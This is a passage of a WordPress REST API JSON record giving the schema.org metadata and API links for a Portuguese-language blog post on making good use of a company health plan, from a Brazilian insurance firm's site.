minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#article","isPartOf":{"@id":"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/"},"author":{"name":"Rafael Gesser","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223"},"headline":"Como usar o plano de sa\u00fade empresarial da melhor forma","datePublished":"2020-03-16T16:28:00+00:00","dateModified":"2020-03-18T19:01:08+00:00","mainEntityOfPage":{"@id":"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/"},"wordCount":665,"commentCount":0,"publisher":{"@id":"https:\/\/blog.oinsurance.com.br\/#organization"},"image":{"@id":"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#primaryimage"},"thumbnailUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/plano-sa\u00fade-empresarial-scaled.jpg","articleSection":["Gest\u00e3o de Benef\u00edcios"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/","url":"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/","name":"Como usar o plano de sa\u00fade empresarial da melhor forma - \u00d4 Insurance","isPartOf":{"@id":"https:\/\/blog.oinsurance.com.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#primaryimage"},"image":{"@id":"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#primaryimage"},"thumbnailUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/plano-sa\u00fade-empresarial-scaled.jpg","datePublished":"2020-03-16T16:28:00+00:00","dateModified":"2020-03-18T19:01:08+00:00","description":"O uso consciente do plano de sa\u00fade empresarial e a preven\u00e7\u00e3o de doen\u00e7as traz benef\u00edcios para a empresa e seus colaboradores.","breadcrumb":{"@id":"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#primaryimage","url":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/plano-sa\u00fade-empresarial-scaled.jpg","contentUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/plano-sa\u00fade-empresarial-scaled.jpg","width":2560,"height":1709,"caption":"plano de sa\u00fade empresarial"},{"@type":"BreadcrumbList","@id":"https:\/\/oinsurance.com.br\/blog\/como-usar-o-plano-de-saude-empresarial\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/blog.oinsurance.com.br\/"},{"@type":"ListItem","position":2,"name":"Como usar o plano de sa\u00fade empresarial da melhor forma"}]},{"@type":"WebSite","@id":"https:\/\/blog.oinsurance.com.br\/#website","url":"https:\/\/blog.oinsurance.com.br\/","name":"\u00d4 Insurance","description":"Seguros Pessoais e Empresariais","publisher":{"@id":"https:\/\/blog.oinsurance.com.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.oinsurance.com.br\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/blog.oinsurance.com.br\/#organization","name":"\u00d4 Insurance","url":"https:\/\/blog.oinsurance.com.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/","url":"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1","contentUrl":"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1","width":409,"height":179,"caption":"\u00d4 Insurance"},"image":{"@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/oinsurancegroup\/","https:\/\/www.instagram.com\/oinsurance\/","https:\/\/www.linkedin.com\/company\/oinsurance\/"]},{"@type":"Person","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223","name":"Rafael Gesser","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g","caption":"Rafael Gesser"}}]}},"_links":{"self":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts\/2390"}],"collection":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/comments?post=2390"}],"version-history":[{"count":0,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts\/2390\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/media\/2496"}],"wp:attachment":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/media?parent=2390"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/categories?post=2390"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/tags?post=2390"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}